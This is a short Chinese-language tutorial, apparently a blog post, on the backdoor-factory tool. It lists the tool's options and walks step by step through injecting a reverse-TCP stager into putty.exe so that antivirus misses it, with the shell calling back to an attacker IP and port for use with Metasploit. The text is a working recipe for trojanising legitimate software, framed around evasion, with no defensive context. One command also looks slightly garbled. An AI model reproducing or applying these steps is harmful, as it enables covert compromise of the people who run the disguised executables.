backdoor-factory详细使用教程

backdoor-factory简介

backdoor-factory是一款后门构建工具。与其他工具不同的是，他不会增加软件的大小，而是利用代码缝隙进行注入，免杀效果更好。

backdoor-factory下载

kali预装的有坑，应该从github下载。

运行命令：  git clone https://github.com/secretsquirrel/the-backdoor-factory.git

backdoor-factory常用命令

-h                  查看帮助信息

-f                   测试指定文件

-S                  检查软件是否支持patch

-s                   指定payload，可以通过"show"来查看

-H                  指定回连的IP地址

-P                  指定回连的端口

-J                   使用多个代码缝隙注入

-c                   查看软件的代码缝隙

-l   num          和" -c" 一起使用,查看大于num的缝隙

-o                   指定输出软件的名称

实例演示-生成免杀木马

1.检查软件是否支持patch

./backdoor.py -f /root/putty.exe -S

2.查看软件代码缝隙大小。

./backdoor.py -f /root/putty.exe -c

3.查看可利用的payload

./backdoor.py -f /root/putty.exe -s show 

4.指定payload、回连的IP地址和端口、输出软件的名字，并且指定要使用的代码缝隙。

./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded  -5.  -H 192.168.3.25 -P 4444  -o 1.exe

5.生成的软件保存在backdoor-factory目录下的backdoored文件夹中，生成的木马可以和msf联合使用。

到此就完成了backdoor的介绍，如果想了解更多的Kali工具，请关注我！